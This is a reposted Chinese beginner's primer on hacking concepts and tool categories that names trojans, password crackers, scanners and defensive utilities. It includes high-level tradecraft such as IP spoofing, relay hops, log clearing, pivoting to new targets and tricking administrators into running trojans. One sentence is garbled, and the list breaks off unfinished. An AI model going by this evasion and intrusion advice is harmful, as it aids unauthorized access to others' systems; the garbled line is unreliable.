Kil
来源:互联网 发布:长征 知乎 编辑:程序博客网 时间:2024/04/29 07:29
首先,呵呵,说明一下,轉帖,适合菜鸟!!这是菜鸟一定要学的最基础知识!!如果这个最基本你都不想看,脑子里只想者刷Q币赚钱,那你不要来看了,回家种田去吧!
记住了,不要看到这么多的文字,就后退了,也许你刚开始满怀激情,但看到一半受不了,没有耐心和学习的欲望是永远不成功的!
如果你看了眼睛痛,你可以把它复制下来,慢慢看!看完后,你收获很大的!!!
好,开始.............
一.骇客的分类和行为
以我的理解,“骇客”大体上应该分为“正”、“邪”两类,正派骇客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派骇客则是通过各种骇客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派骇客所从事的事情违背了《骇客守则》,所以他们真正的名字叫“黑客”(Cracker)而非“骇客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“紅客”(Hacker)。
无论那类骇客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
很多人曾经飾遙骸白齪誑推絞倍甲鍪裁矗渴遣皇非常刺激?”也有人对骇客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,骇客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习骇客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得?
在学习之余,骇客应该将自己所掌握的知识应用到实际当中,无论是哪种骇客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。骇客的行为主要有以下几种:
一、学习技术
互联网上的新技术一旦出现,骇客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“骇客身份”超过一年。
初级骇客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者帶来了很多的资讯,这就需要初级学习者进行选择:太深的内容可能会给学习帶来困难;太“花哨”的内容又对学习骇客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
二、伪装自己:
骇客的一举一动都会被伺服器记录下来,所以骇客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP位址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网路进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
如果有朝一日你成为了真正的骇客,我也同样不赞成你对网路进行攻击,毕竟骇客的成长是一种学习,而不是一种犯罪。
三、发现漏洞:
漏洞对骇客来说是最重要的资讯,骇客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或者修補上这个漏洞。
骇客对寻找漏洞的执着是常人难以想像的,他们的口号说“打破权威”,从一次又一次的骇客实践中,骇客也用自己的实际行动向世人验证了这一点——世界上没有“不存在漏洞”的程式。在骇客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞:
对于正派骇客来说,漏洞要被修補;对于邪派骇客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,骇客利用漏洞可以做下面的事情:
1、获得系统资讯:有些漏洞可以洩漏系统资讯,暴露敏感资料,从而进一步入侵系统;
2、入侵系统:通过漏洞进入系统内部,或取得伺服器上的内部资料、或完全掌管伺服器;
3、寻找下一个目标:一个胜利意味者下一个目标的出现,骇客应该充分利用自己已经掌管的伺服器作为工具,寻找并入侵下一个系统;
4、做一些好事:正派骇客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网路安全的事情;
5、做一些坏事:邪派骇客在完成上面的工作后,会判断伺服器是否还有利用价值。如果有利用价值,他们会在伺服器上植入木马或者后门,便于下一次来访;而对没有利用价值的伺服器他们决不留情,系统崩溃会让他们感到无限的快感!
==================================================
二.骇客应掌握的基本技能
从这一节开始,我们就真正踏上学习骇客的道路了,首先要介绍的是作为一名初级骇客所必须掌握的基本技能,可以通过这一节的阅读了解到骇客并不神秘,而且学习起来很容易上手。为了保证初学者对骇客的兴趣,所以本书采取了回圈式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文:
学习英文对于骇客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关骇客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网路管理员就已经有足够的时间修補漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习骇客从一开始就要尽量阅读英文资料、使用英文软体、并且及时关注国外著名的网路安全网站。
二、学会基本软体的使用:
这里所说的基本软体是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关骇客工具的使用,这主要包括埠扫描器、漏洞扫描器、资讯截获工具和密码破解工具等。因为这些软体品种多,功能各不相同,所以本书在后面将会介绍几款流行的软体使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软体的开发指南,编写自己的骇客工具。
三、初步了解网路协定和工作原理:
所谓“初步了解”就是“按照自己的理解方式”弄明白网路的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是流览网页的时候网路是如何传递资讯、用户端流览器如何申请“握手资讯”、伺服器端如何“应答握手资讯”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本:
同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程式执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变数”和“阵列”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
五、熟悉网路应用程式:
网路应用程式包括各种伺服器软体后台程式,例如:wuftp、Apache等伺服器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成伺服器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网路工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果!
==================================================
网路安全术语解释
一、协议:
网路是一个资讯交换的场所,所有接入网路的电脑都可以通过彼此之间的物理連設備行资讯交换,这种物理設備包括最常見的电纜、光纜、无线WAP和微波等,但是單純擁有这些物理設備并不能实现资讯的交换,这就好像人类的身体不能缺少大脑的支配一样,资讯交换还要具備软体環境,这种“软体環境”是人类实现規定好的一些規则,被稱作“协定”,有了协定,不同的电脑可以遵照相同的协定使用物理設備,并且不会造成相互之间的“不理解”。
这种协议很类似于“摩爾斯电码”,簡單的一点一橫,经过排列可以有萬般变化,但是假如没有“对照表”,誰也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种預先規定的协议完成不同的使命,例如RFC1459协议可以实现IRC伺服器與用户端电脑的通信。因此无论是骇客还是网路管理员,都必须通过学习协定达到了解网路运作机理的目的。
每一个协议都是经过多年修改延續使用至今的,新產生的协议也大多是在基層协议基础上建立的,因而协议相对来说具有较高的安全机制,骇客很难发现协议中存在的安全問題直接入手进行网路攻击。但是对于某些新型协议,因为出现时间短、考慮欠周到,也可能会因安全問題而被骇客利用。
对于网路协定的討论,更多人则认为:现今使用的基層协议在設計之初就存在安全隱患,因而无论网路进行什么样的改动,只要现今这种网路体系不进行根本变革,从根本上就无法杜絕网路骇客的出现。但是这种骇客机能已经超出了本书的範圍,因而不在这里詳細介绍。
二、伺服器與用户端:
最簡單的网路服務形式是:若干台电脑做为用户端,使用一台电脑当作伺服器,每一个用户端都具有向伺服器提出请求的能力,而后由伺服器应答并完成请求的动作,最后伺服器会将执行结果返回给用户端电脑。这样的协议很多。例如我们平时接触的电子郵件伺服器、网站伺服器、聊天室伺服器等都屬于这种类型。另外还有一种連接方式,它不需要伺服器的支援,而是直接将两个用户端电脑进行連接,也就是说每一台电脑都既是伺服器、又是用户端,它们之间具有相同的功能,对等的完成連接和资讯交换工作。例如DCC传輸协议即屬于此种类型。
从此看出,用户端和伺服器分别是各种协议中規定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作者自己的电脑(用户端),别且向网路服務器发出常規请求完成諸如流览网页、收发电子郵件等动作的,而对于骇客来说则是通过自己的电脑(用户端)对其他电脑(有可能是用户端,也有可能是伺服器)进行攻击,以达到入侵、破坏、竊取资讯的目的。
三、系统與系统環境:
电脑要运作必须安装作業系统,如今流行的作業系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些作業系统各自独立运行,它们有自己的檔管理、记憶体管理、进程管理等机制,在网路上,这些不同的作業系统既可以作为伺服器、也可以作为用户端被使用者操作,它们之间通过“协定”来完成资讯的交换工作。
不同的作業系统配合不同的应用程式就構成了系统環境,例如Linux系统配合Apache软体可以将电脑構設成一台网站伺服器,其他使用用户端的电脑可以使用流览器来获得网站伺服器上供流览者阅读的文本资讯;再如Windows2000配合Ftpd软体可以将电脑構設成一台檔伺服器,通过远端ftp登陸可以获得系统上的各种檔资源等。
四、IP位址和埠:
我们上网,可能会同时流览网页、收发电子郵件、进行语音聊天……如此多的网路服務專案,都是通过不同的协定完成的,然而网路如此之大,我们的电脑怎么能够找到服務專案所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。
每一台上网的电脑都具有独一无二的IP位址,这个位址类似于生活中人们的家庭位址,通过网路路由器等多种物理設備(无需初级学习者理解),网路可以完成从一个电脑到另一个电脑之间的资讯交换工作,因为他们的IP位址不同,所以不会出现找不到目标的混乱局面。但是骇客可以通过特殊的方法伪造自己电脑的IP位址,这样当伺服器接受到骇客电脑(伪IP位址)的请求后,伺服器会将应答资讯传送到伪IP位址上,从而造成网路的混乱。当然,骇客也可以根據IP位址輕易的找到任何上网者或伺服器,进而对他们进行攻击(想想现实中的入室搶劫),因而如今我们会看到很多关于《如何隱藏自己IP地址》的文章。
接下来我解释一下上面提到的第二个問題:一台电脑上为什么能同时使用多种网路服務。这好像北京城有八个城门一样,不同的协定体现在不同的网路服務上,而不同的网路服務则会在用户端电脑上开闢不同的埠(城门)来完成它的资讯传送工作。当然,如果一台网路服務器同时开放了多种网路服務,那么它也要开放多个不同的埠(城门)来接納不同的用户端请求。
网路上经常听到的“后门”就是这个意思,骇客通过特殊机能在伺服器上开闢了一个网路服務,这个服務可以用来專门完成骇客的目的,那么伺服器上就会被打开一个新的埠来完成这种服務,因为这个埠是供骇客使用的,因而輕易不会被一般上网用户和网路管理员发现,即“隱藏的埠”,故“后门”。
每一台电脑都可以打开65535个埠,因而理论上我们可以开发出至少65535种不同的网路服務,然而实际上这个数位非常大,网路经常用到的服務协定不过几十个,例如流览网页用户端和服務端都使用的是80号埠,进行IRC聊天则在服務端使用6667埠、用户端使用1026埠等。
五、漏洞:
漏洞就是程式中没有考慮到的情況,例如最簡單的“弱口令”漏洞是指系统管理员忘记遮罩某些网路应用程式中的帳号;Perl程式漏洞则可能是由于程式師在設計程式的时候考慮情況不完善出现的“让程式执行起来不知所措”的代码段,“溢出”漏洞则屬于当初設計系统或者程式的时候,没有預先保留出足够的资源,而在日后使用程式是造成的资源不足;特殊IP包炸彈实际上是程式在分析某些特殊资料的时候出现错误等……
總而言之,漏洞就是程式設計上的人为疏忽,这在任何程式中都无法絕对避免,骇客也正是利用种种漏洞对网路进行攻击的,本章开始的字眼兒“网路安全”实际就是“漏洞”的意思。骇客利用漏洞完成各种攻击是最终的结果,其实真正对骇客的定義就是“寻找漏洞的人”,他们并不是以网路攻击为樂趣,而是天天沉迷在阅读他人的程式并力圖找到其中的漏洞。应该说,从某种程度上講,骇客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的骇客或者乾脆是伪骇客经常利用具有攻击性的漏洞,近些年人们才对骇客有了畏懼和敵視的心理。
六、加密與解密:
在“协议”的講解中,我提到了“由于网路設計的基層存在問題……”,簡單的说这一問題是允许所有上网者參與资讯共用,因而对某些商業、个人隱私在网路上的传送,就会暴露在眾目睽睽之下,我们的信用卡、个人电子郵件等都可以通过監听或者截获的方式被他人的到,如何才能让这些资讯安全呢?读者也许想到了“二戰中”的间諜戰:參戰国家在使用电報的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行解码工作。正是这种古老的加密方式,在现代化的网路上也依然存在它旺盛的生命力,通过加密处理的资讯在网路上传送,无论誰拿到了这份檔,只要没有“密码薄”仍然是白費力氣的。
网路上最长使用的是設置个人密码、使用DES加密鎖,这两种加密方式分别可以完成用户登陸系统、网站、电子郵件信箱和保护资讯包的工作,而骇客所要进行的工作,就是通过漏洞、暴力猜測、加密演算法反向应用等方式获得加密檔案的明文,有人把“魔高一尺、道高一仗”用在这里,的確是在恰当不过了!网路上的加密方法和需要验证密码的系统層出不窮,骇客也在寻找破解这些系统的种种辦法。
可以说,“漏洞”和“解密”是两个完全不同的骇客領域,对于不同的学习者对他们的偏好,将会直接影響到今后将会成为的骇客类型,因而在二者之间的选择,应根據个人喜好进行,本书将会側重学习“漏洞”方面的知识。
七、特洛伊木马:
特洛伊木马是一个程式,这个程式可以做程式設計者有意設計的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根據某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程式当中(也就是将这些程式也变成特洛伊木马)。根據另外的人的理解,不是有意造成任何損坏的病毒不是特洛伊木马。最终,不论如何定義,许多人僅僅用“特洛伊木马”来形容不能复制的帶有惡意的程式,以便将特洛伊木马與病毒区分开。
==================================================
四.常用骇客软体性質分类
一、扫描类软体:
扫描是骇客的眼睛,通过扫描程式,骇客可以找到攻击目标的IP位址、开放的埠号、伺服器运行的版本、程式中可能存在的漏洞等。因而根據不同的扫描目的,扫描类软体又分为位址扫描器、埠扫描器、漏洞扫描器三个类别。在很多人看来,这些扫描器获得的资讯大多数都是没有用处的,然而在骇客看来,扫描器好比骇客的眼睛,它可以让骇客清楚的了解目标,有经验的骇客则可以将目标“摸得一清二楚”,这对于攻击来说是至关重要的。同时扫描器也是网路管理员的得力助手,网路管理员可以通过它既是了解自己系统的运行狀態和可能存在的漏洞,在骇客“下手”之前将系统中的隱患清除,保证伺服器的安全穩定。
现在网路上很多扫描器在功能上都設計的非常強大,并且綜合了各种扫描需要,将各种功能集成于一身。这对于初学网路安全的学习者来说无疑是个福音,因为只要学习者手中具備一款優秀的扫描器,就可以将资讯收集工作輕鬆完成,免去了很多繁瑣的工作。但是对于一个高级骇客来说,这些现成的工具是远远不能胜任的,他们使用的程式大多自己编写开发,这样在功能上将会完全符合个人意圖,而且可以針对新漏洞既是对扫描器进行修改,在第一时间获得最寶貴的目标资料。本书此部分将会介绍扫描器的具体使用方法,而在第二部分中则会具体講述如何开发这些扫描器,请读者務必循序渐进,否则将会给自己的学习帶来很多不必要的煩惱。
二、远端監控类软体:
远端監控也叫做“木马”,这种程式实际上是在伺服器上运行一个用户端软体,而在骇客的电脑中运行一个服務端软体,如此一来,伺服器将会变成骇客的伺服器的“手下”,也就是说骇客将会利用木马程式在伺服器上开一个埠,通过这种特殊的木马功能对伺服器进行監視、控制。因此,只要学习者掌握了某个木马的使用和操作方法,就可以輕易接管网路服務器或者其他上网者的电脑。
在控制了伺服器之后,骇客的攻击行动也就接近尾聲了,然而在做这件事情之前,骇客必须想辦法让伺服器运行自己木马的那个“用户端程式”,这就需要利用漏洞或者进行欺騙。欺騙最簡單,就是想辦法让操作伺服器的人(系统管理员之类)运行骇客的用户端程式,而利用漏洞则要初学者阅读完本书后面的内容才能够做到了。
三、病毒和蠕蟲:
首先聲明一下:编写病毒的做法并不屬于骇客。病毒只不过是一种可以隱藏、复制、传播自己的程式,这种程式通常具有破坏作用,雖然病毒可以对互联网造成威脅,然而它并没有试圖寻找程式中的漏洞,所以制作病毒还有病毒本身对骇客的学习都没有实际意義。
之所以提到病毒,是因为蠕蟲和病毒有很多相似性,如蟲也是一段程式,和病毒一样具有隱藏、复制、船舶自己的功能。不同的是蠕蟲程式通常会寻找特定的系统,利用其中的漏洞完成传播自己和破坏系统的作用,另外蠕蟲程式可以将收到攻击的系统中的资料传送到骇客手中,这要看蠕蟲設計者的意圖,因而蠕蟲是介于木马和病毒之间的一类程式。
电脑蠕蟲是自包含的程式(或是一套程式),它能传播它自身功能的拷貝或它的某些部分到其他的电脑系统中(通常是经过网路連接)。蠕蟲的制造需要精深的网路知识,还要具備高超的编程水準,对于一个初学骇客的学习者来说,蠕蟲的制造和使用都是非常难理解的,并且大多数蠕蟲攻击的物件是Linux系统,而本书所使用的学习平台是Windows 95/98或Windows NT/2000,因而我同样建议初学者不要过多的涉及这部分内容,有关此部分内容也将会在《攻学兼防》的第二部分中有所介绍。
四、系统攻击和密码破解:
这类软体大多数都是由高级骇客编写出来的,供初级骇客使用的现成软体,软体本身不需要使用者具備太多的知识,使用者只要按照软体的说明操作就可以达到软体的預期目的,因而这类软体不具備学习骇客知识的功效。不过这类软体对于骇客很重要,因为它可以大幅度減小骇客的某些繁瑣工作,使用者经过对软体的設置就可以让软体自动完成重复的工作,或者由软体完成大量的猜測工作,充分利用剩余时间繼續学习网路知识。
系统攻击类软体主要分为资讯炸彈和破坏炸彈。网路上常見的垃圾电子郵件就是这种软体的“傑作”,还有聊天室中经常看到的“踢人”、“罵人”类软体、论坛的垃圾灌水器、系统藍屏炸彈也都屬于此类软体的变異形式。如果学习者能够认真学习骇客知识,最终可以自己编写类似的工具,但如果某个人天天局限于应用此类软体上,他将永远是一个“伪骇客”。
密码破解类软体和上面的软体一样,完全依*它将对学习骇客毫无帮助。对于真正的骇客来说,这种软体可以帮助寻找系统登陸密码,相对于利用漏洞,暴力破解密码要簡單许多,但是效率会非常低,但是真正的骇客无论是使用密码破解软体还是利用漏洞进入系统之后,都达到了自己入侵的目的,因此对于如何进入系统,对于某些溺爱系统攻击的骇客来说无关緊要。值得一提的是:真正执者于漏洞分析的骇客是从来不使用这种软体的,而我向来将分析漏洞作为至高无上的工作,所以也尽量不去接触此类软体。
五、監听类软体:
通过監听,骇客可以截获网路的资讯包,之后对加密的资讯包进行破解,进而分析包内的资料,获得有关系统的资讯;也可能截获个人上网的资讯包,分析的到上网帳号、系统帳号、电子郵件帳号等个人隱私资料。監听类软体最大的特点在于它是一个亦正亦邪的,因为网路资料大多经过加密,所以用它来获得密码比较艱难,因而在更多的情況下,这类软体是提供给程式开发者或者网路管理员的,他们利用这类软体进行程式的調试或伺服器的管理工作。
==================================================
五.常用骇客软体用途分类
一、防範:
这是从安全的角度出发涉及的一类软体,例如防火墙、查病毒软体、系统进程監視器、埠管理程式等都屬于此类软体。这类软体可以在最大程度上保证电脑使用者的安全和个人隱私,不被骇客破坏。网路服務器对于此类软体的需要也是十分重視的,如日誌分析软体、系统入侵软体等可以帮助管理员维护伺服器并对入侵系统的骇客进行追踪。
二、资讯搜集:
资讯搜集软体种类比较多,包括埠扫描、漏洞扫描、弱口令扫描等扫描类软体;还有監听、截获资讯包等间諜类软体,其大多数屬于亦正亦邪的软体,也就是说无论正派骇客、邪派骇客、系统管理员还是一般的电脑使用者,都可以使用者类软体完成各自不同的目的。在大多数情況下,骇客使用者类软体的頻率更高,因为他们需要依*此类软体对伺服器进行全方位的扫描,获得盡可能多的关于伺服器的资讯,在对伺服器有了充分的了解之后,才能进行骇客动作。
三、木马與蠕蟲:
这是两种类型的软体,不过他们的工作原理大致相同,都具有病毒的隱藏性和破坏性,另外此类软体还可以由擁有控制权的人进行操作,或由事先精心設計的程式完成一定的工作。当然这类软体也可以被系统管理员利用,当作远端管理伺服器的工具。
四、洪水:
所谓“洪水”即资讯垃圾炸彈,通过大量的垃圾请求可以導致目标伺服器負載超負荷而崩溃,近年来网路上又开始流行DOS分散式攻击,簡單地说也可以将其歸入此类软体中。洪水软体还可以用作郵件炸彈或者聊天式炸彈,这些都是经过簡化并由网路安全爱好者程式化的“傻瓜式”软体,也就是本书一开始指責的“伪骇客”手中经常使用的软体。
五、密码破解:
网路安全得以保证的最实用方法是依*各种加密演算法的密码系统,骇客也许可以很容易获得一份暗文密码檔,但是如果没有加密演算法,它仍然无法获得真正的密码,因此使用密码破解类软体势在必行,利用电脑的高速計算能力,此类软体可以用密码字典或者窮举等方式还原经过加密的暗文。
六、欺騙:
如果希望获得上面提到的明文密码,骇客需要对暗文进行加密演算法还原,但如果是一个复杂的密码,破解起来就不是那么簡單了。但如果让知道密码的人直接告訴骇客密码的原型,是不是更加方便?欺騙类软体就是为了完成这个目的而設計的。
七、伪装:
网路上进行的各种操作都会被ISP、伺服器记录下来,如果没有经过很好的伪装就进行骇客动作,很容易就会被反跟踪技术追查到骇客的所在,所以伪装自己的IP地址、身份是骇客非常重要的一节必修課,但是伪装技术需要高深的网路知识,一开始没有堅实的基础就要用到这一类软体了。
==================================================
学习骇客的基本環境
一、作業系统的选择:
我们经常听说骇客酷爱Linux系统,这是因为Linux相对Windows提供了更加靈活的操作方式,更加強大的功能。例如对于IP位址的伪造工作,利用Linux系统编写特殊的IP頭资讯可以輕鬆完成,然而在Windows系统下卻几乎不可能做到。但是Linux也有它不足的一面,这个系统的命令龐杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有过多的人会放棄“舒适”的Windows、放棄精彩的电脑遊戲和便捷的操作方式,去全心投入骇客学习中。而且对于初学骇客的学习者来说,大多数网路知识都可以在Windows系统中学习,相对Linux系统,Windows平台下的骇客软体也并不在少数,另外通过安装套装程式,Windows系统中也可以調试一定量的程式,因此初步学习骇客没有必要从Linux入手。
本书使用的平台WindowsME,因为对于个人用户来说,NT或者2000多少有些苛刻——系统配置要求太高;然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容測试漏洞,从远端伺服器出发,所以也不是非要WindowsME作業系统进行学习,对于少数系统版本之间的差異,学习者可以和我联系获得相应系统的学习方法。
二、需要的常用软体:
除了基本的作業系统以外,学习者还需要安装各类扫描器,之后下載一个比较優秀的木马软体、一个監听类软体,除此以外别无它求。如果有必要,读者可以自行安装本文上述软体,然后学习其用法,但是我要告訴你,对于各类炸彈、还有网路上各式各样的骇客软体,在学习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软体。
对于扫描器和監听软体,我给出以下建议,并且在本书的后面还会对这几个软体进行詳細介绍:
扫描器:
監听软体:
木马:
三、額外的工具:
如果可以安装下面的工具,将会对学习骇客有莫大的帮助,当然下面的软体主要是学习額外内容并为“第二部分”学习作鋪墊用的,所以没有也不会妨礙本书的学习。
1、后台伺服器:
擁有某些网路应用的后台服務程式,可以将自己的电脑設置成一个小型伺服器,用来学习相应的网路应用,从“内部”了解其运作机理,这将会大大提高自己对伺服器的感性认识,同时还能够在啟动伺服器的时候;監測自己伺服器上的资料,如果有其他骇客来攻击,则可以清晰的记录下对方的攻击过程,从而学习到更多的骇客攻击方法。对于本书而言,主要介绍网站的Perl和asp等脚本语言漏洞,所以可以安装一个IIS或者HTTPD。然后在安装ActivePerl,使自己的伺服器具備编譯cgi和pl脚本的能力。使用自己的伺服器还有一个好处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、有不会对网路構成威脅,一举两得。
2、C语言编譯平台:
今后在学习骇客的路途中,将会遇到很多“屬于自己的問題”,这些問題网路上的其他人可能不会注意,所以无法找到相应的程式,这个时候学习者就要自己动手开发有关的工具了,所以安装一个Borland C++将会非常便捷,通过这个编譯器,学习者既可以学习C语言,也能够修改本书后面列出的一些小程式,打造一个屬于自己的工具庫。
四、网路安全软体分类
现在我们来了解一下有关网路安全软体的分类,因为学习骇客知识是两个相互联系的过程:既学习如何黑,还要学会如何防止被黑。
1、防火墙:
这是网路上最常見的安全机制软体,防火墙有硬体的、也有软体的,大多数读者看到的可能更多都是软体防火墙。其功能主要是过濾垃圾资讯(保证系统不会受到炸彈攻击)、防止蠕蟲入侵、防止骇客入侵、增加系统隱私性(对敏感资料进行保护)、即时監控系统资源,防止系统崩溃、定期维护资料庫,備份主要资讯……防火墙可以将系统本身的漏洞修補上,让骇客没有下手的机会。另外对于擁有局域网的企業来说,防火墙可以限制系统埠的开放,禁止某些网路服務(杜絕木马)。
2、檢測软体:
互联网上有專门針对某个骇客程式进行清除的工具,但是这类软体更多是集成在殺毒软体或者防火墙软体内的,对于系统内的木马、蠕蟲可以进行檢測并清除,软体为了保护系统不受侵害,会自动保护硬碟资料、自动维护註冊表檔、檢測内容可以代码、監測系统埠开放狀態等。如果用户需要,软体还可以编写有关的脚本对指定埠进行遮罩(防火墙一样具備此功能)。
3、備份工具:
專门用来備份资料的工具可以帮助伺服器定期備份资料,并在制定时间更新资料,这样即便骇客破坏了伺服器上的资料庫,软体也可以在短时间内完全修复收到入侵的资料。另外对于个人用户,这类软体可以对硬碟进行完全映射備份,一旦系统崩溃,用户利用这类软体可以将系统恢复到原始狀態,例如Ghost就是这类软体中的佼佼者。
4、日誌紀录、分析工具:
对于伺服器来说,日誌檔是必不可少的,管理员可以通过日誌了解伺服器的请求类型和请求来源,并且根據日誌判断系统是否受到骇客攻击。通过日誌分析软体,管理员可以輕鬆的对入侵骇客进行反追踪,找到骇客的攻击来源,进而抓不骇客。这也就是为什么骇客在攻击的时候多采用IP位址伪装、伺服器跳轉,并在入侵伺服器之后清除日誌檔的原因。
==================================================
网路流行骇客软体簡介
(因主要教大家防禦而不是攻击,因此暫时不提供相关的软体下載,需要研究的朋友可以去网路搜索。稍后将有软体的詳細使用说明)
一、国產经典软体簡介(先介绍写老软体,但其在国產骇客業内有举足輕重的作用。)
溯雪
密码探測器:利用溯雪可以輕鬆的完成基于web形式的各种密码猜測工作,例如email、forum中的註冊用户密码等。软体采取多线程编写,除了支援字典和窮举以外,软体最大的特色是可以自己编写猜測規则,例如可以按照中文拼音或者英文單詞拼写規则隨机組合出字典檔,最大程度上保证了猜測的準確性。
乱刀
密码破解:乱刀可以破解unix系统中的密码暗文,对于取得了etc/passwd檔的骇客来说这是必不可少的。
天网
防火墙软体:中国第一套通过公安部认证的软硬体集成防火墙,能有效的防止骇客入侵,抵禦来自外部网路的攻击,保证内部系统的资料不被盜取,它根據系统管理者設定的安全規则把守企業网路,提供強大的访問控制、身份认证、应用选通、网路位址轉换、资讯过濾、虛擬專网、流量控制、虛擬网橋等功能。
冰河
木马类软体:国内響噹噹的木马软体,知名度絕不亞于BO,主要用于远端監控。自动跟踪螢幕变化、记录各种口令资讯、获取系统资讯、限制系统功能、任意操作檔及註冊表、远端关机、发送资讯等多种監控功能。此软体的一大特色是可以由使用者自己設置需要佔用的埠,如此一来監控类软体就很难从埠号上直接判断系统是否存在冰河了。
小分析家
監測类软体:免費网路协定分析工具,这个工具的特点是介面簡單实用,與国外的一些sniffer產品相比,如Netxray,结果更为直觀。此软体为免費版本,只能运行在NT系统下,同时编写此软体的公司还提供了软体的商業版本“网警”。
快速搜索
埠扫描器:快速搜索是一个在网路上搜索伺服器的软体,可以根據给定的位址和埠号查找机器。具有多线程同时搜索技术,可以将搜索速度提高到單线程的十倍以上。
其他:針对2000/XP扫描的D-TOOLS等。
二、常見网路安全软体簡介
Local Port Scanner
本地埠扫描器:通过这个软体可以監測本地电脑被打开的埠。此软体可以監測大多数骇客入侵或者木马佔用的埠,它有五种不同的扫描方式并可以获得有关埠的詳細扫描资讯。
A-spy
系统进程察看器:A-spy可以監測Windows系统啟动过程中調用的所有程式、执行的进程,并将结果保存在日誌檔中。这个软体的用途是檢察系统是否被安置了木马程式,同时软体还可以对系统啟动需要調用的程式进行增加、刪除和编輯等操作,改变調用程式之间的先后順序,软体支援包括NT、2000在内的所有Windows平台,具有17种方式清楚木马程式。
Netmon
圖形化Netstat命令:Netmon是圖形化的Netstat命令,它运行在Windows系统中,可以察看系统的TCP、UDP連接狀態,同时此软体提供了一份完整的木马、蠕蟲佔用埠清單,可以快速了解系统是否存在安全問題。
LANguard Network Scanner
局域网资料收集器:LANguard允许使用者扫描局域网内部的搜索电脑,搜集他们的netbios资讯、打开埠、共用情況和其他相关资料,这些资料及可以被骇客利用进行攻击,也可以被管理员利用进行安全维护,通过它可以強行关閉指定埠和共用目录。
Leechsoft's NetMonitor
TCP/IP狀態分析程式:这个软体使用于系统安全管理员、网路程式开发员、一般的擁护。此工具可以顯示电脑在上网狀態下存在的TCP/IP連接,同时还能分析是否有其他人正在監視上网者电脑中的某个埠,同时此工具内部还有一个功能強大的埠扫描程式。
Win Trinoo Server Sniper
清除Win.TrinooServer程式:Win.Trinoo是一个类似DOS攻击的木马程式,被植入它的电脑将变成一台Win.TrinooServer,骇客通过这个Server能够“借刀殺人”攻击其他电脑系统。Win TrinooServer Sniper可以高速的監測电脑是否存在此問題。
SubSeven Server Sniper
清除SubSeven Server程式:同上面的工具一样,SubSeven也是一个木马程式,而SubSeven ServerSniper则是用来檢測并清除SubSeven而設計的。不同的是,这个软体不但可以清楚SubSeven,而且还能搜集攻击者在您电脑中留下的蛛絲马迹,找到攻击者的ICQ号码、email位址等内容,从而为反跟踪提供了詳盡的资讯。
Attacker
埠監听程式:这是一个TCP/UDP埠監听程式,它可以常駐系统并在危險埠打开的时候发出警告资讯,保证个人上网隱私的安全性。
ICEWatch
